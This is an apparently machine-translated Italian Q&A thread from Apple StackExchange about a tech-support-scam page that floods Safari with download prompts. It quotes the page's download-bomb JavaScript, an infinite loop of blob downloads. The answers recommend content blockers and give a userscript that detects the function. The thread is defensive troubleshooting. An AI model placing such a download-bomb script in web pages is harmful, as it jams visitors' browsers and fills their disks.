Impedisci download di spam su Safari

8

sfondo

Una nuova pagina di spam ha iniziato ad apparire in molti siti "discutibili" (siti di film, ecc.). Questa nuova pagina di spam rientra nella categoria di scansioni false, MacKeeper, "YOU HAVE A VIRUS", ecc. Categoria.

Problema

Il problema con questa nuova pagina è che invece di avere solo un popup, la pagina avvia effettivamente un download di file casuali da 2kb (non dannosi contiene solo testo casuale) ripetutamente ogni ~ 1ms. La cartella di download si riempie prima che tu possa chiudere la finestra e ti rimane l'eliminazione di oltre 1000 file. A differenza di un problema simile in cui uno spam di pagina fa apparire la finestra di dialogo di stampa, c'è poco tempo per reagire.

Tentativi di risoluzione dei problemi non riusciti

  • Ho provato a bloccare la cartella di download. Mentre ha impedito ai download di ... beh ... scaricarlo, appare una finestra di dialogo (vedi immagine). Di solito, potrei semplicemente chiudere questa finestra di dialogo, ma poiché il download viene tentato ogni ~ 1 ms, ogni volta che provo a chiudere la finestra viene visualizzata una nuova finestra di dialogo che mi impedisce di chiudere la finestra.

  • Forza la chiusura di Safari, che interrompe il download (dopo i download di 1k) ma poi perdo tutte le altre finestre

  • Modifica delle impostazioni in "Richiedi ogni download" nelle preferenze di Safari. Non funziona perché 1k di finestre di dialogo separate aperte mi impediscono di chiudere anche la scheda. Safari che si arresta in modo anomalo.

inserisci qui la descrizione dell'immagine

inserisci qui la descrizione dell'immagine

Domanda

Come posso impedire il download di spam in Safari?

AGGIORNARE:

Ecco il codice che causa il download (ottenuto disabilitando JavaScript e guardando manualmente il codice):

 function download(g, h, j) {
                var k = new Blob([g], {
                        type: j
                });
                if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
                else {
                        var l = document.createElement("a"),
                                m = URL.createObjectURL(k);
                        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
                }
        }
        function bomb_ch() {
                var g = Math.random().toString(36).substring(20),
                        h = Math.floor(50 * Math.random() + 25);
                while (true) download(h, g, g)
        }
        function ch_jam() {
                bomb_ch()
        }

Nota: ho riscontrato alcuni problemi durante l'esecuzione di JS in una pagina personalizzata. Si è bloccato invece di essere scaricato. Sono stato in grado di emulare il download utilizzando una setInterval()funzione che chiama una downloadfunzione.

Maggiori informazioni: https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

macos  safari  data-transfer  malware 
JBIS
fonte
I commenti non sono per una discussione estesa; questa conversazione è stata spostata in chat .
bmike
@JBis È quasi giunto il momento di assegnare la taglia
Matt,
@Matt ho altre 24 ore. E non sto assegnando alcuna risposta nella sua forma attuale.
JBis,

Risposte:

5

Non sarebbe un buon caso per un blocco dei contenuti Safari / blocco JavaScript che è selettivo?

Ghostery potrebbe essere un buon punto di partenza sul Mac per vedere se è possibile utilizzare le regole predefinite per annullare lo scripting tra siti e l'iniezione di annunci di codice nelle pagine Web. Ovviamente, se la pagina offre direttamente quel contenuto, dovrai disabilitare javascript su quella pagina o prendere nota e semplicemente bloccare quei siti che accumulano la tua esperienza intenzionalmente o a causa della vendita dell'iniezione di annunci a chiunque abbia i mezzi per permettersi questo spavento e articoli truffa.

Se vuoi essere più preciso, gli script utente di tipo GreaseMonkey potrebbero combatterlo con sufficiente conoscenza di JS da parte tua (o trovare qualcuno che ha scritto lo script per bloccare l'iterazione odierna di questo malware).

A cura di @JBis

Il seguente script utente ha bloccato correttamente la pagina. 

     // ==UserScript==
     // @name         The Bomb Squad
     // @version      0.1
     // @description  Blocks the pages containing any function with the bomb_ch function detailed in /apple/329594/prevent-spam-downloads-on-safari and https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/
     // @author       Josh Brown (@JBis https://apple.stackexchange.com/users/263848/jbis)
     // @match        *
     // @grant        none

    // ==/UserScript==

   if (typeof bomb_ch === "function") {
     document.getElementsByTagName("body")[0].innerHTML="<h1>Page Defused by The Bomb Squad</h1><p>Because it contatained the following
 function(s):  <pre>bomb_ch()</pre> <br>";
    }

Nota: le ammine Sp (c) possono aggirarlo facilmente randomizzando la bomb_ch()funzione.

Le versioni più recenti del sistema operativo di Safari potrebbero aiutare a ridurre un po 'questo, ma ci sono soldi che devono essere fatti dalle persone che forniscono questo carico di schifezze al tuo Mac in modo che si adatteranno probabilmente a qualsiasi tecnologia che provi a renderlo facile da bloccare. A meno che tu non sia disposto a spendere più soldi per sostenere un'azienda che mantiene una libreria di impostazioni in grado di "colpire una talpa" e adattarsi più velocemente di quanto i ciarlatani possano cucinare nuovo codice nel loro locale caldaie .

Dovrai anche decidere se i siti Web che lo fanno sono anche ciarlatani che fanno parte della truffa poiché dovrebbero sapere che ti sta succedendo, uno dei visitatori che ospitano.

bmike
fonte
2
@JBis Tampermonkey funziona se lo installi manualmente: ignora "Safari non supporta più l'estensione non sicura" in macOS Mojave
grg
1
@grg Grg ( il suono ) devi rieseguire ogni riavvio del browser :)
JBis
5

Sebbene ci siano molti bloccatori di annunci capaci per Safari, ci sono molte meno scelte per i bloccanti di contenuti ad ampio spettro e basati su estensioni. Di questi, solo due spiccano: Ghostery e uBlockOrigin [ link informazioni: https://github.com/gorhill/uBlock link per il download: https://safari-extensions.apple.com/?q=ublock%20origin .

EDIT: Non confondere uBlock origine con il nome molto simile uBlock, . I due prodotti sono sostanzialmente diversi per capacità e reputazione.

Possono fare quello che vuoi e impedire l'attentato dinamitardo ai tuoi amici? Sì, con la distinzione che Ghostery avrebbe bisogno di alcune regole di personalizzazione in cui uBlockOrigin è impostato per farlo come predefinito.

Mi capita di sapere che uBlockOrigin ha bloccato questo particolare exploit un mese prima dell'annuncio di Malwarebytes nel tuo link "Ulteriori informazioni". Non so sulla cronologia di Ghostery.

Consiglierei di provare entrambi.

Doc G.
fonte
Per favore non cancellare la risposta. Potrebbe ancora aiutare gli altri. Continuerò a fare test per vedere se lo strumento può bloccare con una regola personalizzata.
JBis
@JBis se vuoi inserire un URL in chat che possiamo eliminare in seguito, eseguimi il ping lì. Stai dicendo che l'unico clic su "disabilita tutto" da ghostery non ti protegge da questa funzione.
bmike
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.